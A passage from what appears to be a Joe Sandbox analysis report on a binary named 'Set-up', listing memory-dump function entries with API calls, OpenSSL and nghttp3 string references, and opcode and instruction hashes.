                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$strcpy
                            • String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
                            • API String ID: 2790333442-843477118
                            • Opcode ID: 44ef087ade5eab977c5c087928e7d225aa726bf2a8e2d98755f4e12f3233c806
                            • Instruction ID: 079a8b13a01379a5ba67bebc365f5ab7772ba8e689c060f35b9a921f95d42521
                            • Opcode Fuzzy Hash: 44ef087ade5eab977c5c087928e7d225aa726bf2a8e2d98755f4e12f3233c806
                            • Instruction Fuzzy Hash: C1E1027290C301DBD721AA28C88172EB7E5AFD1754F04CB2DF9DCA7292E775D9448B82
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,008AC1CE,?,00000003,?), ref: 008AE4EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
                            • API String ID: 1222420520-1997541155
                            • Opcode ID: 978277b8278db3f761ce36182ae274799850d54728b3a66c1c64bed8dbfec0f4
                            • Instruction ID: e5c9ce47ddddf067418dc5a8078e6e16debe261d93743270af16132f06085b84
                            • Opcode Fuzzy Hash: 978277b8278db3f761ce36182ae274799850d54728b3a66c1c64bed8dbfec0f4
                            • Instruction Fuzzy Hash: BCE10532B042145BE7189E2CC890769B7D7FBDA310F298A3CE9A9C77C1E635DC488795
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 00A6E5F2
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00A6E67F
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00A7003E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 0b872ac8fce49b2298d266c6e37586f0cc7c3ebead7bcd650dd619a9a9a0812f
                            • Instruction ID: 8e677a6024977594c06fef201431e7bd09798d3d31b858194cecafa9b086bd69
                            • Opcode Fuzzy Hash: 0b872ac8fce49b2298d266c6e37586f0cc7c3ebead7bcd650dd619a9a9a0812f
                            • Instruction Fuzzy Hash: A7D24FAAC39B9541E313A63D68122E6E7506FFB184F51E72BFCD470E52EF21B2844319
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4$`$`
                            • API String ID: 0-1230936812
                            • Opcode ID: c9faf3a73ff776874146059d2c803ed6fef6c4d686a578494d3ee3b224d6b33c
                            • Instruction ID: 2aae3e59567bd59a07ecfe279334de022c6fbbe0f2b1ecd6d3e0aef5abc7a8a8
                            • Opcode Fuzzy Hash: c9faf3a73ff776874146059d2c803ed6fef6c4d686a578494d3ee3b224d6b33c
                            • Instruction Fuzzy Hash: 64B29E729087928FD725CF18C8806AAB7E1FFC9304F15CB6DE8A997356D730A945CB42
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: $ $
                            • API String ID: 0-3665324030
                            • Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                            • Instruction ID: 4c6e78d36d875bc27048876352c35e8b0e97398463f45dafe1b4e3fc23a1b186
                            • Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                            • Instruction Fuzzy Hash: D262E0759087918FC324CF29C48066AFBE1BFC9310F158A6EE9E993351E734A945CF92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
                            • API String ID: 0-2745174052
                            • Opcode ID: 2e4aef176d89db81af443484594ec084eb53091f84536840c1ec9c3bd70c4378
                            • Instruction ID: e5e396ead0fb87ef3c9e818498b136614034699cb8625c0f2b215f7897803e99
                            • Opcode Fuzzy Hash: 2e4aef176d89db81af443484594ec084eb53091f84536840c1ec9c3bd70c4378
                            • Instruction Fuzzy Hash: 4BD13775608351ABE7309F54ED42F6BB7E9AFC4304F04482CF9895B286E675E848CB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f439abf780340f4d498f3d4a6ed9a083c74f54d07a1710a9aec5400b5b9e2bc8
                            • Instruction ID: efd56f127676dedde5710c6c98bdecaa7a9794eabc4396d794fac9bd50c46f31
                            • Opcode Fuzzy Hash: f439abf780340f4d498f3d4a6ed9a083c74f54d07a1710a9aec5400b5b9e2bc8
                            • Instruction Fuzzy Hash: C2828E71A087558FC724DF2CC88026AF7E1FBC8704F158A6EE9A997391D770A845CB92
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00A6E16E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: providers/implementations/kdfs/argon2.c
                            • API String ID: 3510742995-3406374482
                            • Opcode ID: 17c3af5549dfc7f3696b9cf93c2056f4e18c308a503b84e6a38391d2787a1e09
                            • Instruction ID: 30e8e220fdc483cf557e4cefc452f99bf18efe1c7c35bfcfaa569366f015c43f
                            • Opcode Fuzzy Hash: 17c3af5549dfc7f3696b9cf93c2056f4e18c308a503b84e6a38391d2787a1e09
                            • Instruction Fuzzy Hash: CC512775D087009BC310EB38D84169AF7E8FFA8354F558E2DE986A7242E731FA85C785
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 6b24c7aaf9505bc938e31667426fef2b2ea38e9d874609c7abd5cfab532628d5
                            • Instruction ID: 20aae3ce5adedbd1ab2cbe3002ac0a20c9300ea7bc20ffdab1b3b6b01ff11680
                            • Opcode Fuzzy Hash: 6b24c7aaf9505bc938e31667426fef2b2ea38e9d874609c7abd5cfab532628d5
                            • Instruction Fuzzy Hash: 50E25831A093658BC714DF69C49052EFBE6AFC8304F198E6DE99597360D770EC46CB82
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,00B522FC,?,?), ref: 00B5447B
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 00B54760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 795e482bfac3f4b62fcabf2f8ba10843909c337f9e5d3e27cb8c6895c8f45453
                            • Instruction ID: b301f74c533de3788f78d21677934fada09c793ca95130d64cdac37d7e776626
                            • Opcode Fuzzy Hash: 795e482bfac3f4b62fcabf2f8ba10843909c337f9e5d3e27cb8c6895c8f45453
                            • Instruction Fuzzy Hash: 05C1A075604B018FD724CF29C4C0B26B7E1FF8A319F1489ADE9AA87791D730E889CB51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: \
                            • API String ID: 0-2967466578
                            • Opcode ID: facab326826172095c550d2e9fadc1349068c579c1beefac798506d4a413f59a
                            • Instruction ID: 482829aa89fc256282aaef40e0988cac04a5a6cddae388720bf57ca2d53eb96c
                            • Opcode Fuzzy Hash: facab326826172095c550d2e9fadc1349068c579c1beefac798506d4a413f59a
                            • Instruction Fuzzy Hash: 0602B2669083156BEB60AA24DC81F2B76B8FB50708F44483DFD89D6243F635ED1897A3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b747d86157e915ba1c75205814a78b1ca71f2dcb168b0d02f440f493ee4b3f0d
                            • Instruction ID: aefb1a9c6c439655c3ac37663810802b61a7cbc82e2bbd80e8134ef75866276c
                            • Opcode Fuzzy Hash: b747d86157e915ba1c75205814a78b1ca71f2dcb168b0d02f440f493ee4b3f0d
                            • Instruction Fuzzy Hash: B4D1E3315087819FC716CF29C48056AFBE2BF9A314F098A6DE8DA97262D730FD45CB52
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                            • Instruction ID: b65936c12bc34c1f45b624d10ad4631b2039978d408e4b1404658b8b126aa816
                            • Opcode Fuzzy Hash: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                            • Instruction Fuzzy Hash: 6CA1E0726083018FC714CE28D480B2AB7E6FFC5314F59876EE595DB392E635D8468F86
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: H
                            • API String ID: 0-2852464175
                            • Opcode ID: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                            • Instruction ID: bcf5f092a0b49daf0582ee9950dfd449d8073c117f56b986b2e8a87f0f0c98e3
                            • Opcode Fuzzy Hash: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                            • Instruction Fuzzy Hash: BD919531B083558FCB19CE19C49062EB7E3FBC9314F2A863ED996D7391DA319C468B85
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000004), ref: 009F05D5
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
